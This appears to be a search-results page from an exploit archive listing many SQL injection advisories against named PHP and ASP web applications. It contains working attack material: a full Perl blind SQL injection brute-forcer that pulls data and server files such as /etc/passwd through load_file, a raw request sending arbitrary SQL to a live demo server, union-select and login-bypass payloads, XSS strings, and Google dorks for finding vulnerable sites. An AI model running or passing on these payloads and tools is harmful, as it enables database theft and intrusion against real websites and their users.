Search result for 'my SQL us'
DungPQ/Flex MySQL Connector SQL Injection ( na)
$$$ Flex MySQL Connector Remote SQL Execution Exploit $$$

Flex MySQL Connector
  || License: Commercial
  || Language: English
  || Cost: $45.00
  || Platform: Flash Player 9 | Flash Player 10
  || Demo: http://flexappsstore.com/flexapps/demo/mysql/
Credit
  || Name: ~Fyodor (aka DungPQ)
  || Email: quangdung181188[at]gmail.com
  || Location: Hanoi, Vietnam

[$] Vulnz Description:
Flex MySQL Connector is a Flex component from FlexAppsStore which allows running SQL from ActionScript via a PHP backend (Flash <=> PHP <=> MySQL). But anybody can modify the SQL command in the request packet and send it to the PHP backend, which means anybody can send SQL commands to the victim's MySQL server => OMG!

[$] Exploitz:
Send an example SQL command to MySQL at http://flexappsstore.com/flexapps/demo/mysql/
-----------------------------------------------------------------------------------
> Dest.IP = 66.147.242.177
> Dest.PORT = 80
---[Request BOF]---
POST /flexapps/flexmysqlconn.php?irand=0.2112374654971063 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.10
Host: www.flexappsstore.com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: http://flexappsstore.com/flexapps/demo/mysql/index.swf
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
Content-Length: 89
Content-type: application/x-www-form-urlencoded

fas%5Fdb=flexapps%5Fdemxo&fas%5Fsql=SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig
---[Request EOF]---
(Oh yeah, the SQL command is SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig => SELECT count(*) as cnt1 FROM tbl_bigbig)

[$] PS: I don't give the full PoC source code. You can make your PoC in PHP (using fsockopen(), cURL, ...) but if you want, contact me. ^_^
[$] ~Fyodor - The Still Lake
Flex MySQL Connector suffers from a remote SQL injection vulnerability.
Snakespc/Joomla SQL Report Blind SQL Injection ( na)
==============================================================================
[»]Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability
==============================================================================
[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc - Email: super_cristal@hotmail.com - Site: sec-war.com/cc ]
[»] Greetz to: [ sec-warTeaM, PrEdAtOr, alnjm33 >>> All My Members >> sec-war.com/cc ]
[»] Dork:inurl:"com_sqlreport"
[»] Demo:http://fullysms.com/fullysms/administrator/components/com_sqlreport/ajax/print.php?table=fsms_coverage&fields=country|idd|carrier|credit&filters=&username=&user_id=0
[»]
###########################################################################
===[ Exploit ]=== PoC Blind Joomla (user_id) com_sqlreport >>>> Note: placed in a folder as C:\Perl\bin\snakespc.pl
###########################################################################
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
use IO::Handle;
use strict;
$| = 1;
###############################################################################
my $default_debug = 0;
my $default_length = 32;
my $default_method = "GET";
my $default_time = 0;
my $version = "1.1";
my $default_useragent = "bsqlbf $version";
my $default_dict = "dict.txt";
my $default_sql = "version()";
###############################################################################
$| = 1;
my ($args, $abc, $solution);
my ($string, $char, @dic);
my (%vars, @varsb);
my ($lastvar, $lastval);
my ($scheme, $authority, $path, $query, $fragment);
my $hits = 0;
my $usedict = 0;
my $amatch = 0;
my ($ua,$req);
###############################################################################
#
#Define GetOpt:
my ($url, $sql, $time, $rtime, $match, $uagent, $charset, $debug);
my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent);
my ($dict, $start, $length, $method, $cookie,$blind);
my ($help, $bincharset, $get, $nodict);
my $options = GetOptions (
'help!' => \$help,
'url=s' => \$url,
'get=s' => \$get,
'sql=s' => \$sql,
'blind=s' => \$blind,
'match=s' => \$match,
'charset=s' => \$charset,
'start=s' => \$start,
'length=s' => \$length,
'dict=s' => \$dict,
'method=s' => \$method,
'uagent=s' => \$uagent,
'ruagent=s' => \$ruagent,
'cookie=s' => \$cookie,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'rproxy=s' => \$rproxy,
'debug!' => \$debug,
'rtime=s' => \$rtime,
'time=i' => \$time );
&help unless ($url);
&help if $help eq 1;
#########################################################################
# Default Options.
$abc = charset();
$uagent ||= $default_useragent;
$debug ||= $default_debug;
$length ||= $default_length;
$solution ||= $start;
$method ||= $default_method;
$sql ||= $default_sql;
$time ||= $default_time;
&createlwp();
&parseurl();
if ( ! defined($blind)) {
$lastvar = $varsb[$#varsb];
$lastval = $vars{$lastvar};
} else {
$lastvar = $blind;
$lastval = $vars{$blind};
}
if (defined($cookie)) { &cookie() }
if (!$match) {
print "\nTrying to find a match string...\n" if $debug == 1;
$amatch = "1";
&auto_match();
}
&banner();
&httpintro();
if ( ! $get) { &sqlget() } else { &fileget() }
sub fileget {
#ord(MID(compress(load_file(0xfilename)),1,1))
$get =~ m,.*/(.*),;
my $lget = $1;
my $rsize = $start + 1;
if (-e "$lget" && ! $start) {
$rsize = -s "$lget";
print "Error: file ./$lget exists.\n";
print "You can erase or resume it with: -start $rsize\n";
exit 1
}
my ($fstr,$i);
my $fsize = "";
$fstr = unpack("H*","$get");
# GET size of file.
$abc = "0123456789";
for ($i=1;$i<=15;$i++) {
my $furl;
my $find = 0;
foreach (split/ */,$abc) {
$find = 0;
$char = ord();
$string = " and mid(length(load_file(0x$fstr)),$i,1)=char($char)";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $string;
}
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$string/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
foreach (split(/\n/,$html)) {
if (/\Q$match\E/) {
my $asc=chr($char);
$fsize .= $asc;
$find = 1;
}
last if $find == 1;
}
last if $find == 1;
}
last if $find == 0;
}
if ($fsize < "1") { print "Error: file not found, no permissions or ... who knows\n"; exit 1 }
# starting ..
$length = "$fsize bytes";
$abc = "getfile [256]";
$sql = "load_file($get)";
&bsqlintro();
# Get file
open FILE, ">>$lget";
FILE->autoflush(1);
print "\n--- BEGIN ---\n";
my ($i,$b,$fcontent);
$rsize = 1 if $rsize < 1;
for ($i=$rsize;$i<=$fsize+1;$i++) {
my $find = 0;
my ($furl, $b_start, $b_end, $z);
for ($z=0;$z<272;$z+=16) {
my $zz = $z + 16;
$string = " and ord(mid(load_file(0x$fstr),$i,1))>=$z and ord(mid(load_file(0x$fstr),$i,1))<=$zz";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $string;
}
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$string/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
foreach (split(/\n/,$html)) {
if (/\Q$match\E/) {
$b_start = $z;
$b_end = $z + 16;
$find = 1;
}
last if $find == 1;
}
last if $find == 1;
}
print "$fcontent";
for ($b=$b_start;$b<=$b_end;$b++) {
$find = 0;
$string = " and mid(load_file(0x$fstr),$i,1)=char($b)";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $string;
}
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$string/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
foreach (split(/\n/,$html)) {
if (/\Q$match\E/) {
$fcontent = pack("C*","$b");
print FILE "$fcontent";
$find = 1;
}
last if $find == 1;
}
last if $find == 1;
}
}
print "\n--- END ---\n";
close FILE;
$solution = "success";
}
sub sqlget {
&bsqlintro();
$dict ||= $default_dict;
open DICT,"$dict"; @dic=<DICT>; close DICT;
my $i;
$nodict = 0;
for ($i=length($start)+1;$i<=$length;$i++) {
my $furl;
my $find = 0;
$abc = charset();
&bsqlintro if $debug == 1;
print "\r trying: $solution ";
foreach (split/ */,$abc) {
$find = 0;
$char = ord();
$string = " AND MID($sql,$i,1)=CHAR($char)";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $string;
}
print "\x08$_";
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$string/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
foreach (split(/\n/,$html)) {
if (/\Q$match\E/) {
my $asc=chr($char);
$solution .= $asc;
$find = 1;
}
last if $find == 1;
}
last if $find == 1;
}
if ($usedict ne 0 && $find eq 0) { $nodict=1; $i--; }
if ($find eq "0" && $usedict eq "0") { last; };
}
}
&result();
#########################################################################
sub httpintro {
my ($strcookie, $strproxy, $struagent, $strtime, $i);
print "--[ http options ]"; print "-"x62; print "\n";
printf ("%12s %-8s %11s %-20s\n","schema:",$scheme,"host:",$authority);
if ($ruagent) { $struagent="rnd.file:$ruagent" } else { $struagent = $uagent }
printf ("%12s %-8s %11s %-20s\n","method:",uc($method),"useragent:",$struagent);
printf ("%12s %-50s\n","path:", $path);
foreach (keys %vars) {
$i++;
printf ("%12s %-15s = %-40s\n","arg[$i]:",$_,$vars{$_});
}
if (! $cookie) { $strcookie="(null)" } else { $strcookie = $cookie; }
printf ("%12s %-50s\n","cookies:",$strcookie);
if (! $proxy && !$rproxy) { $strproxy="(null)" } else { $strproxy = $proxy; }
if ($rproxy) { $strproxy = "rnd.file:$rproxy" }
printf ("%12s %-50s\n","proxy_host:",$strproxy);
if (! $proxy_user) { $strproxy="(null)" } else { $strproxy = $proxy_user; }
# timing
if (! $time && !$rtime) { $strtime="0sec (default)" }
if ( $time == 0) { $strtime="0 sec (default)" }
if ( $time == 1) { $strtime="15 secs" }
if ( $time == 2) { $strtime="5 mins" }
if ($rtime) { $strtime = "rnd.time:$rtime" }
printf ("%12s %-50s\n","time:",$strtime);
}
sub bsqlintro {
my ($strstart, $strblind, $strlen, $strmatch, $strsql);
print "\n--[ blind sql injection options ]"; print "-"x47; print "\n";
if (! $start) { $strstart = "(null)"; } else { $strstart = $start; }
if (! $blind) { $strblind = "(last) $lastvar"; } else { $strblind = $blind; }
printf ("%12s %-15s %11s %-20s\n","blind:",$strblind,"start:",$strstart);
if ($length eq $default_length) { $strlen = "$length (default)" } else { $strlen = $length; }
if ($sql eq $default_sql) { $strsql = "$sql (default)"; } else { $strsql = $sql; }
printf ("%12s %-15s %11s %-20s\n","length:",$strlen,"sql:",$strsql);
printf ("%12s %-50s\n","charset:",$abc);
if ($amatch eq 1) { $strmatch = "auto match:" } else { $strmatch = "match:"; }
#printf ("%12s %-60s\n","$strmatch",$match);
print " $strmatch $match\n";
print "-"x80; print "\n\n";
}
#########################################################################
sub createlwp {
my $proxyc;
&getproxy;
&getuagent if $ruagent;
LWP::Debug::level('+') if $debug gt 3;
$ua = new LWP::UserAgent(
cookie_jar=> { file => "$$.cookie" });
$ua->agent("$uagent");
if (defined($proxy_user) && defined($proxy_pass)) {
my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
$proxy =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
$proxyc = $pscheme."://".$proxy_user.":".$proxy_pass."@".$pauthority;
} else { $proxyc = $proxy; }
$ua->proxy(['http'] => $proxyc) if $proxy;
undef $proxy if $rproxy;
undef $uagent if $ruagent;
}
sub cookie {
# Cookies check
if ($cookie || $cookie =~ /; /) {
foreach my $c (split /;/, $cookie) {
my ($a,$b) = split /=/, $c;
if ( ! $a || ! $b ) { die "Wrong cookie value. Use -h for help\n"; }
}
}
}
sub parseurl {
###############################################################################
# Official Regexp to parse URI. Thank you somebody.
($scheme, $authority, $path, $query, $fragment) =
$url =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
# Parse args of URI into %vars and @varsb.
foreach my $varval (split /&/, $query) {
my ($var, $val) = split /=/, $varval;
$vars{$var} = $val;
push(@varsb, $var);
}
}
# Define CHARSET to use. Dictionary /// (TODO: fix ugly code)
sub charset {
if ($hits ne 0 && $nodict eq 0) {
my (%tmp,@b,$foo); undef %tmp; undef @b; undef $abc;
foreach my $line (@dic) {
chomp $line;
if ($line =~ /\Q$solution\E/ && $line !~ /^#/) {
$foo = $line; $foo =~ s/\Q$solution\E//;
foreach ((split/ */,$foo)) {
if ($tmp{$_} ne "1" ) {
$tmp{$_} = "1"; push (@b,$_);
}
}
}
}
if ($#b >= 0) {
foreach my $c (@b) { $abc .=$c;}
$usedict = $abc;
print "\nUsing a dictionary with this charset: $abc\n" if $debug == 1;
} else {
$abc = chardefault()
}
} else {
$abc = chardefault()
}
return $abc;
}
sub chardefault {
my $tmp;
$abc = $charset;
if (lc($charset) eq "md5") {
$abc = "abcdef0123456789\$.";
} elsif (lc($charset) eq "num") {
$abc = "0123456789";
} elsif (lc($charset) eq "all" || ! $charset) {
$abc = "abcdefghijklmnopqrstuvwxyz0123456789\$.:-_()[]{}º@=/\\|#?¿&·!<>ñÑ";
}
# If a dictionary has been used before, remove chars from current charset
if ($usedict ne 0) {
foreach (split(/ */, $usedict)) {
$abc =~ s/$_//;
}
}
$usedict = 0;
return $abc;
}
sub auto_match {
$match = fmatch("$url");
}
#########################################################################
# Show options at running:
sub banner {
print "\n //com_sqlreport Blind SQL injection brute force.\n";
print " // super_cristal\@hotmail.com / http://www.sec-war.com\n\n";
}
#########################################################################
# Get differences in HTML
sub fmatch {
my ($ok,$rtrn);
my ($furla, $furlb) = ($_[0], $_[0]);
my ($html_a, $html_b);
if (lc($method) eq "get") {
$furla =~ s/($lastvar=$lastval)/$1 AND 1=1/;
$furlb =~ s/($lastvar=$lastval)/$1 AND 1=0/;
$html_a = fetch("$furla");
$html_b = fetch("$furlb");
} elsif (lc($method) eq "post") {
$vars{$lastvar} = $lastval . " AND 1=1";
$html_a = fetch("$furla");
$vars{$lastvar} = $lastval . " AND 1=0";
$html_b = fetch("$furla");
$vars{$lastvar} = $lastval;
}
my @h_a = split(/\n/,$html_a);
my @h_b = split(/\n/,$html_b);
foreach my $a (@h_a) {
$ok = 0;
if ($a =~ /\w/) {
foreach (@h_b) {
if ($a eq $_) {$ok = 1; }
}
} else { $ok = 1; }
$rtrn = $a;
last if $ok ne 1;
}
return $rtrn;
}
#########################################################################
# Fetch HTML from WWW
sub fetch {
my $secs;
if ($time == 0) { $secs = 0 }
elsif ($time == 1) { $secs = 15 }
elsif ($time == 2) { $secs = 300 }
if ($rtime =~ /\d*-\d*/ && $time == 0) {
my ($l,$p) = $rtime =~ m/(\d+-\d+)/;
srand; $secs = int(rand($p-$l+1))+$l;
} elsif ($rtime =~ /\d*-\d*/ && $time != 0) {
print "You can't run with -time and -rtime. See -help.\n";
exit 1;
}
sleep $secs;
my $res;
if (lc($method) eq "get") {
my $fetch = $_[0];
if ($cookie) {
$res = $ua->get("$fetch", Cookie => "$cookie");
} elsif (!$cookie) {
$res = $ua->get("$fetch");
}
} elsif (lc($method) eq "post") {
my($s, $a, $p, $q, $f) =
$url=~m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
my $fetch = "$s://$a".$p;
if ($cookie) {
$res = $ua->post("$fetch",\%vars, Cookie => "$cookie");
} elsif (!$cookie) {
$res = $ua->post("$fetch",\%vars);
}
} else {
die "Wrong httpd method. Use -h for help\n";
}
my $html = $res->content();
return $html;
}
sub getproxy {
if ($rproxy && $proxy !~ /http/) {
my @lproxy;
open PROXY, $rproxy or die "Can't open file: $rproxy\n";
while(<PROXY>) { push(@lproxy,$_) if ! /^#/ }
close PROXY;
srand; my $ind = rand @lproxy;
$proxy = $lproxy[$ind];
} elsif ($rproxy && $proxy =~ /http/) {
print "You can't run with -proxy and -rproxy. See -help.\n";
exit 1;
}
}
sub getuagent {
my @uproxy;
open UAGENT, $ruagent or die "Can't open file: $ruagent\n";
while(<UAGENT>) { push(@uproxy,$_) if ! /^#/ }
close UAGENT;
srand; my $ind = rand @uproxy;
$uagent = $uproxy[$ind];
chop($uagent);
}
sub result {
print "\r results: \n" .
" $sql = $solution\n" if length($solution) > 0;
print " total hits: $hits\n";
}
sub help {
&banner();
print " usage: $0 <-url http://www.host.com/path/script.php?foo=bar> [options]\n";
print "\n options:\n";
print " -sql:\t\tvalid SQL syntax to get; connection_id(), database(),\n";
print "\t\tsystem_user(), session_user(), current_user(), last_insert_id(),\n";
print "\t\tuser() or all data available in the requested query, for\n";
print "\t\texample: user.password. Default: version()\n";
print " -blind:\tparameter to inject sql. Default is last value of url\n";
print " -match:\tstring to match in valid query, Default is try to get auto\n";
print " -charset:\tcharset to use. Default is all. Others charsets supported:\n";
print " \tall:\tabcdefghijklmnopqrstuvwxyz0123456789\$.-_()[]{}º@=/\\|#?¿&·!<>ñÑ\n";
print " \tnum:\t0123456789\n";
print " \tmd5:\tabcdef0123456789\$\n";
print " \tcustom:\tyour custom charset, for example: \"abc0123\"\n";
print " -start:\tif you know the beginning of the string, use it.\n";
print " -length:\tmaximum length of value. Default is $default_length.\n";
print " -dict:\t\tuse dictionary for improve speed. Default is dict.txt\n";
print " -time:\t\ttimer options:\n";
print " \t0:\tdont wait. Default option.\n";
print " \t1:\twait 15 seconds\n";
print " \t2:\twait 5 minutes\n";
print " -rtime:\twait random seconds, for example: \"10-20\".\n";
print " -method:\thttp method to use; get or post. Default is $default_method.\n";
print " -uagent:\thttp UserAgent header to use. Default is $default_useragent\n";
print " -ruagent:\tfile with random http UserAgent header to use.\n";
print " -cookie:\thttp cookie header to use\n";
print " -rproxy:\tuse random http proxy from file list.\n";
print " -proxy:\tuse proxy http. Syntax: -proxy=http://proxy:port/\n";
print " -proxy_user:\tproxy http user\n";
print " -proxy_pass:\tproxy http password\n";
print "\n examples:\n bash# $0 -url http://www.somehost.com/blah.php?u=5 -blind u -sql \"user()\"\n";
print " bash# $0 -url http://www.buggy.com/bug.php?r=514&p=3 -get \"/etc/passwd\"\n";
exit(1);
}
The Joomla SQL Report component suffers from a remote blind SQL injection vulnerability.
Hussin X/PHP-MySQL-Quiz SQL Injection ( na)
# PHP-MySQL-Quiz SQL Injection Vulnerability
#
# Author: Hussin X
# Home : http://www.iq-ty.com
# email: darkangel_g85[at]Yahoo[DoT]com
##########################################################
# HomE script : http://www.widgetmonkey.com/
# Download : http://www.getfreesofts.com/script_download.php?id=18744&id_1=881
# DorK : inurl:quizinfo.php

Exploit:
http://www.site.com/Script/editquiz.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8--

IQ-SecuritY FoRuM
PHP-MySQL-Quiz suffers from a remote SQL injection vulnerability.
Liz0ziM/randshopSQL.txt ( na)
Randshop (all versions) SQL Injection
Website: http://www.randshop.com
Demo: http://www.randshop.com/demoshop/
-------------------------------------------------------------------
Credit: Liz0ziM & wannacut
Mail: Liz0@bsdmail.com
www.biyo.tk
-------------------------------------------------------------------
exploit:
http://[victim]/folder/themes/kategorie/index.php?kategorieid=6[SQL]
http://[victim]/folder/themes/kategorie/index.php?katid=40[SQL]
--------------------------------------------------------------------------------
eg:
http://www.randshop.com/demoshop/themes/kategorie/index.php?kategorieid=21'
--------------------------------------------------------------------
Google: intext:"software 2004-2005 by randshop"
http://www.blogcu.com/Liz0ziM/112800/
http://biyo.5gigs.com/randshop.txt
Randshop is susceptible to SQL injection attacks.
Breeeeh/icgSQL.txt ( na)
================================
By: Breeeeh
Breeeeh@hotmail.com
example:
/politika/naslovna.phtml?akcija=vijest&id=[SQL Injection]
Internet Crna Gora is susceptible to a SQL injection flaw.
benjamin moss/evolveSQL.txt ( na)
vendor site: http://www.lynxinternet.com/
product: Evolve Merchant
bug: SQL injection
risk: medium
SQL injection (GET):
http://site.com/viewcart.asp?zoneid='[sql]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
Evolve Merchant suffers from a SQL injection vulnerability.
benjamin moss/abarcarSQL.txt ( na)
software: Abarcar
product: Realty Portal
vendor site: http://www.abarcar.com/
risk: medium
/newsdetails.php?neid=[sql]
/slistl.php?slid=[sql]
/content.php?cat=[sql]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
The Abarcar Realty Portal is susceptible to SQL injection attacks.
laurent gaffie/fishcart-sql.txt ( na)
vendor site: http://fishcart.org/
product: Fish Cart
bug: SQL injection
risk: medium
SQL injection:
/display.php?cartid=200701210157208&zid=1&lid=1&olimit=5&cat=&key1=&nlst=y&olst='[sql]
(change the cartid value with yours)
laurent gaffie
http://s-a-p.ca/
contact: saps.audit@gmail.com
Fish Cart is susceptible to SQL injection attacks.
Sw33t h4cK3r/saphpshowcat-sql.txt ( na)
Discovery by: Sw33t h4cK3r
powered by: saphp
----------------------------
Exploit:
http://Example.com/story/showcat.php?forumid=[SQL]
Saphp suffers from a SQL injection vulnerability.
/dependet-sql.txt ( na)
_________________________
A R I A - S E C U R I T Y
_________________________
Dependet Forums (Username Field) Remote SQL Injection
DORK: Powered by: Dependent Forums v1.02
Insert your SQL injection code into the Username field. For example:
' union select * from members where member=1
Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info
Dependet Forums suffers from a SQL injection vulnerability.
GeFORC3/ohesa-sql.txt ( na)
Ohesa Emlak Portalı SQL Injection Vulnerability
#Software: Ohesa Emlak Portalı
#download: not free (300 $) sale: http://www.aspindir.com/goster/5178
#demo: http://www.ohesa.com.tr/web/emlak/www/
#Found By: GeFORC3 (G3)
#Example & Exploit:
http://www.site.com/script_path/satilik.asp?Kategori=[SQL]
http://www.site.com/script_path/detay.asp?Emlak=[SQL]
WwW.GeFORC3.Org | WwW.HeykirBlog.Com | WwW.NetKaBus.Com
Ohesa Emlak Portal is susceptible to a SQL injection vulnerability.
Silitix/calendarSQL.txt ( na)
[P]roduct: Calendar
Provided by Codewalkers
[O]fficial site: http://Calendar.codewalkers.com
[V]ulnerability: SQL Injection
[E]xploitation: /calendar.php?display=event&id=[SQL]
[C]redit: Silitix - www.Silitix.com
[O]riginal security advisory: www.Silitix.com/calendar-cws.php
[G]reetz: Simo64 / MSRT / VeNoM630 / CrAsH_oVeR_rIdE ... :)
Calendar from Codewalkers is susceptible to a SQL injection flaw.
Diabolic Crab/litecommerceSQL.txt ( na)
Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: LiteCommerce SQL injection and revealing errors vulnerability
Date: 07/04/2005
Vendor: LiteCommerce
Vendor Website: http://www.litecommerce.com
Summary: LiteCommerce SQL injection and revealing errors vulnerability

Proof of Concept Exploits:

http://localhost/test/cart.php?target='PHP_SCRIPT_EXPOSUREPHP_SCRIPT_EXPOSURE

http://localhost/test/cart.php?target=category&category_id='SQL_INJECTION
SQL INJECTION
1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SQL_INJECTION' AND 1 ORDER BY order_by, name' at line 1 in SELECT category_id,image_width,image_height,name,description,meta_tags,enabled,views_stats,order_by,membership,threshold_bestsellers,parent,image_type FROM xlite_categories WHERE parent=''SQL_INJECTION' AND 1 ORDER BY order_by, name
This reveals column and table information, thus is very high risk and easy to exploit.

http://localhost/test/cart.php?target=product&product_id='SQL_INJECTION&category_id=246
SQL INJECTION
1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SQL_INJECTION' AND enabled=1' at line 1 in SELECT inventory_id,amount,low_avail_limit,enabled,order_by FROM xlite_inventories WHERE inventory_id=''SQL_INJECTION' AND enabled=1

Possible Fixes:
The usage of htmlspecialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the MySQL database, or before echoing data on the screen, would solve these problems.

Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon to come out book on Secure coding with php.
LiteCommerce is susceptible to SQL injection attacks.
GeFORC3/netkamp-sql.txt ( na)
Netkamp Emlak Scripti XSS & SQL Injections Vulnerability
#Software: Netkamp Emlak Scripti
#download: not free(350 YTL) sale: http://www.netkamp.com/net_emlak.asp
#demo: http://netemlak.netkamp.com/
#Found By: GeFORC3 ( G3 )
#Exploit & example :
-----------------------------------------------------------------------
#XSS:
http://www.site.com/script_path/iletisim.asp
write the XSS code in the script's text box
example:
İletişim Formu (contact form)
Adınız: "><script>alert("G3");</script>
Soyadınız: "><script>alert("G3");</script>
E-Mail: "><script>alert("G3");</script>
Konu: "><script>alert("G3");</script>
Mesajınız: "><script>alert("G3");</script>
Press the "gönder" (send) button.
This XSS works on the "Netkamp Emlak Scripti" script's contact page
-----------------------------------------------------------------------
#SQL Injections
http://www.site.com.com/script_path/detay.asp?ilan_id=[SQL]
-----------------------------------------------------
WwW.GeFORC3.ORG | WwW.HeykirBlog.Org | WwW.NetKaBus.CoM
Netkamp Emlak Scripti is susceptible to a SQL injection vulnerability.
/giab-sql.txt ( na)
__________________________
A R I A - S E C U R I T Y
_________________________
Gallery In A Box Username & Password Parameters SQL Injection
Vendor: http://www.kerberosdev.net/
http://target.com/admin_console/index.asp
Username: anything' OR 'x'='x
Password: anything' OR 'x'='x
Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info
Greetz: AurA
Gallery In A Box suffers from a SQL injection vulnerability.